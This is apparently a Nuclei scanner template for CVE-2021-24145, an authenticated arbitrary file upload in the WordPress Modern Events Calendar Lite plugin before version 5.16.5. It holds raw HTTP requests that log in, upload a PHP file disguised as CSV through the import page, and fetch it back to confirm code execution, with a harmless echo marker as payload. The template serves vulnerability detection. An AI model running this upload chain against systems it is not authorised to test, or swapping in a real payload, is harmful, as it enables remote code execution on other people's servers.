2023-03-05 13:42:10 +00:00
id : CVE-2021-24145
info :
2023-03-27 17:46:47 +00:00
name : WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload
2023-03-05 13:42:10 +00:00
author : theamanrawat
severity : high
description : |
2023-03-27 17:46:47 +00:00
WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.
2023-09-06 12:09:01 +00:00
remediation : Fixed in version 5.16.5.
2023-03-05 13:42:10 +00:00
reference :
- https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
- https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
- https://github.com/dnr6419/CVE-2021-24145
- https://nvd.nist.gov/vuln/detail/CVE-2021-24145
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2021-24145
cwe-id : CWE-434
2023-10-23 12:22:20 +00:00
epss-score : 0.93499
2023-11-03 10:59:12 +00:00
epss-percentile : 0.98826
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : webnus
product : modern_events_calendar_lite
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive
2023-03-05 13:42:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-05 13:42:10 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type : multipart/form-data; boundary=---------------------------132370916641787807752589698875
-----------------------------132370916641787807752589698875
Content-Disposition : form-data; name="feed"; filename="{{randstr}}.php"
Content-Type : text/csv
<?php echo 'CVE-2021-24145'; ?>
-----------------------------132370916641787807752589698875
Content-Disposition : form-data; name="mec-ix-action"
import-start-bookings
-----------------------------132370916641787807752589698875 --
- |
GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
2023-07-11 19:49:27 +00:00
req-condition : true
2023-03-05 13:42:10 +00:00
matchers-condition : and
matchers :
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- contains(header_3, "text/html")
2023-03-05 13:42:10 +00:00
- status_code_3 == 200
- contains(body_3, 'CVE-2021-24145')
condition : and
2023-11-03 15:16:28 +00:00
# digest: 4a0a0047304502207974157013ad43e2dc0b0820c04c84842044b824814dec6f2134249f22f27275022100bde3a2e99909916f90031b1026d27c09525f759b7f47743089ba113847535f31:922c64590222798bb761d5b6d8e72950